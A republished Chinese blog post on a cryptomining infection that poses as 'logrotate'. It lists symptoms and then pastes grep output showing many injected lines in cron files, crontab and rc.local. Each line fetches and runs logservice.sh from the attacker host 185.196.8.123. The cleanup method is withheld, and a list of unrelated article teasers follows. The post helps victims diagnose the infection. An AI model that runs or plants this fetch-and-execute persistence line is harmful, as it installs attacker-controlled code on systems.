【已解决】挖矿病毒 logrotate 185.196.8.123

news/2024/11/20 14:31:13/文章来源:https://www.cnblogs.com/aligege/p/18289685

如果你最近也中了这个病毒,看这篇文章就对了。

网上找了几篇类似文章,都是教你杀进程、删文件,但新版的病毒已经进化了,进程杀死复活,文件删掉又有了...

经过本人几天的尝试,最终找到了干掉他的方法。

 

先确定下你的症状是不是跟我一样?

问题现象:Shell登录慢,logrorateCPU占用高,这个进程的文件路径为:/root/.config/logrotate,删掉又重新生成。

 

使用find /etc | xargs grep -ri "185.196.8.123" 命令查了下,大概有以下文件被加入了恶意脚本:

各种级别的定时任务、系统登录、退出时执行

/etc/cron.daily/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.daily/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.daily/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/rc.d/rc.local:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) >/dev/null 2>&1
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.weekly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.weekly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.weekly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.weekly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.monthly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.monthly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.monthly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.monthly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/crontab:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/crontab:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/crontab:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/crontab:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/crontab:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/crontab~:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/crontab~:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/crontaz~:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/crontaz~:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.daily/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.daily/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.daily/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.daily/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.daily/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.daily/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
grep: /etc/systemd/system/dev-virtiox2dports-org.qemu.guest_agent.0.device.wants: 没有那个文件或目录
grep: /etc/systemd/system/dev-virtiox2dports-org.qemu.guest_agent.0.device.wants/qemu-guest-agent.service: 没有那个文件或目录
/etc/rc.local:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) >/dev/null 2>&1
grep: /etc/alternatives/mta-mailqman: 没有那个文件或目录
grep: /etc/alternatives/mta-newaliasesman: 没有那个文件或目录
grep: /etc/alternatives/mta-sendmailman: 没有那个文件或目录
grep: /etc/alternatives/mta-aliasesman: 没有那个文件或目录
/etc/rc.d/rc.local:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) >/dev/null 2>&1
/etc/rc.d/rc.local:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) >/dev/null 2>&1
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.weekly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.weekly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.weekly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.weekly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.weekly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.weekly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.weekly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.weekly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.monthly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.monthly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.monthly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.monthly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.monthly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.monthly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.monthly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.monthly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/crontab:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/crontab:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/crontab:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/crontab:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/crontab:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/crontab~:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/crontab~:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/crontaz~:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/crontaz~:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)

 

解决思路:

正常解决思路无法清理掉,博主使用了一波骚操作来顺利清理掉。为了防止写此病毒脚本的人看到这篇文章来升级脚本,思路就不放出来了。需要的同学请留言,我来无偿发你

中病毒原因:我猜你大概率是开过8000端口😄

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/740494.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

分片集群平衡器Balancer

分片集群平衡器Balancer

分片集群平衡器 MongoDB 平衡器是一个后台进程,用于监控每个分片集合中每个分片的数据量。当给定分片上的分片集合的数据量达到特定的 迁移阈值时,平衡器会尝试在分片之间自动迁移数据,并在尊重区域的情况下使每个分片的数据量达到均衡。默认情况下,平衡器进程始终处于启用…
阅读更多...
Pytnon变量print打印计数显示前面补零 0001、0002

Pytnon变量print打印计数显示前面补零 0001、0002

前言全局说明Pytnon变量计数显示前面补零 0001、0002一、说明 环境: Windows 11 家庭版 23H2 22631.3737 Python 3.8.10 (tags/v3.8.10:3d8993a, May 3 2021, 11:48:03) [MSC v.1928 64 bit (AMD64)] on win32二、变量print打印计数显示前面补零 0001、0002 >>> fram…
阅读更多...
CTF流量分析刷题(1)

CTF流量分析刷题(1)

简单的一道流量分析题目可以看到是传了一个webshell先URL解码,再进行base64解码可以看到是读取了flag.txt的内容,很容易即可拿到flag。
阅读更多...
深耕分析型数据库领域,火山引擎ByteHouse入围《2024爱分析数据库厂商全景报告》

深耕分析型数据库领域,火山引擎ByteHouse入围《2024爱分析数据库厂商全景报告》

更多技术交流、求职机会,欢迎关注字节跳动数据平台微信公众号,回复【1】进入官方交流群。近日,爱分析发布《2024爱分析数据库厂商全景报告》,报告中爱分析将数据市场从上至下划分为数据库服务、数据库运维管理产品、数据库产品三层,其中数据库产品又包括事务型关系数据库、…
阅读更多...
AI Agent技术的最新进展与改变世界的典型项目巡礼

AI Agent技术的最新进展与改变世界的典型项目巡礼

AI Agent技术的最新进展与改变世界的典型项目巡礼AI Agent技术的最新进展与改变世界的典型项目巡礼 1. AI Agent 技术发展以及典型项目 1.0 前 AI Agent 时代在学术探索的浩瀚星空中,机器人技术领域的璀璨明珠莫过于Agent技术的深入研究,这一领域历来是创新与突破的温床。回溯…
阅读更多...
Unity读取xml文件

Unity读取xml文件

在XML中配置字典名称,字典的key和value,目前key和value都是用的string类型,通过ParseXml类的ParseData函数,传递字典名称和key来获取value xml文件内容解析数据类 using UnityEngine; using System.Xml; using System;/// <summary> /// 读取xml信息类 /// </summ…
阅读更多...
【比赛】高一小学期2

【比赛】高一小学期2

【比赛】高一小学期2 题解挺唐的比赛,一道数位 dp 原题一道平衡树,然后 T1 数据范围还整错了。。没图了呜呜【比赛】高一小学期2$Rank$赛时日前赛后T1 同类分布 思路 印象里为数不多搞懂了的数位 dp,但过太久忘了,只能赛时打暴力 后来发现跟正解很接近了,只是在 dfs 前的预…
阅读更多...
针对于早期版本的flutter开发的app的处理

针对于早期版本的flutter开发的app的处理

下为某个flutter开发的app的hook app为flutter开发,知道是一个AES加密,但是相关so中方法的hook经验较少 这个app的dart的版本较早,是2.10的,找了一个开源的脚本,对代码进行了处理,获取到相对的so层的方法和地址 脚本地址:https://github.com/rscloura/Doldrums 目前较好…
阅读更多...
(10)逻辑综合添加约束(环境约束)

(10)逻辑综合添加约束(环境约束)

一、环境约束此外,还有电路内互连线的延时也没有考虑在内四个环境约束:1.输出负载如果电路的输出负载过大,将会加大电路的transition time,从而影响电路时序此外,若dc默认输出负载为0,即相当于不接负载,这样综合出来的电路时序显然过于乐观,不能反映实际工作情况可以设…
阅读更多...
[GIT] 解决:git status时有Untracked files(未跟踪的文件)

[GIT] 解决:git status时有Untracked files(未跟踪的文件)

1 问题描述git pull时失败,报Please move or remove them before you merge。结果git status显示有一堆不太想提交的Untracked files(未跟踪的文件)。那么,Untracked files文件状态的文件,是什么?一般又如何处理呢?2 原因分析我们要真正弄明白问题的原因,我们就要先知道文…
阅读更多...
windows版Oracle11g安装记录

windows版Oracle11g安装记录

一、下载Oracle 11g数据库安装包 已上传至博客园文件中 二、安装Oracle 11g 下载下来是下图这样的两个压缩包:1、解压这两个压缩包到同一个文件夹(切记路径文件不可有中文、空格和不规则字符。): 2、将解压好的win64_11gR2_database_2of2\database\stage\Components下的所有…
阅读更多...
使用UFUNCTION(BlueprintCallable)修饰了函数,但是在蓝图中找不到怎么办?

使用UFUNCTION(BlueprintCallable)修饰了函数,但是在蓝图中找不到怎么办?

在蓝图图表中,任意空位右键,去掉“情境勾选”就好了。
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023